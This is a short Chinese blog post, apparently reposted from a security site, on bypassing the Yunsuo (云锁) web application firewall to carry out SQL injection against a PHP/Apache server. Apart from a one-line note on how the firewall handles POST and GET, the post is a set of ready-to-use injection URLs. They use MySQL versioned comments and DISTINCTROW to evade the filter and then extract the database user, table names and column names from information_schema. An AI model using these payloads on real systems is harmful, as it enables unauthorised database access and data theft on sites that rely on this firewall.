绕过云锁进行SQL注入

颓废 2019年5月19日09:21:37评论1,782 views字数 593阅读1分58秒阅读模式

环境

win03 + apache + php + 云锁 win_3.1.6

绕过

法1

云锁特性:先检测post,安全的话就会跳过get

法2

联合:

https://www.0dayhack.com/test.php?id=2%27/*!40000/*!30000union*/DISTINCTROW select 1,2,3-- -

用户名/数据库:

https://www.0dayhack.com/test.php?id=2%27/*!40000/*!30000union*/DISTINCTROW select 1,user (),3-- -

表名:

https://www.0dayhack.com/test.php?id=2%27/*!40000/*!30000union*/DISTINCTROW select/N,table_name,/Nfrom information_schema.tables where table_schema='blog' limit 1 offset 1-- -

列名:

https://www.0dayhack.com/test.php?id=2%27/*!40000/*!30000union*/DISTINCTROW select/N,column_name,/Nfrom information_schema.columns where table_name='users' limit 1 offset 1-- -

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
颓废
  • 本文由 发表于 2019年5月19日09:21:37
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   绕过云锁进行SQL注入http://cn-sec.com/archives/68154.html

发表评论

匿名网友 填写信息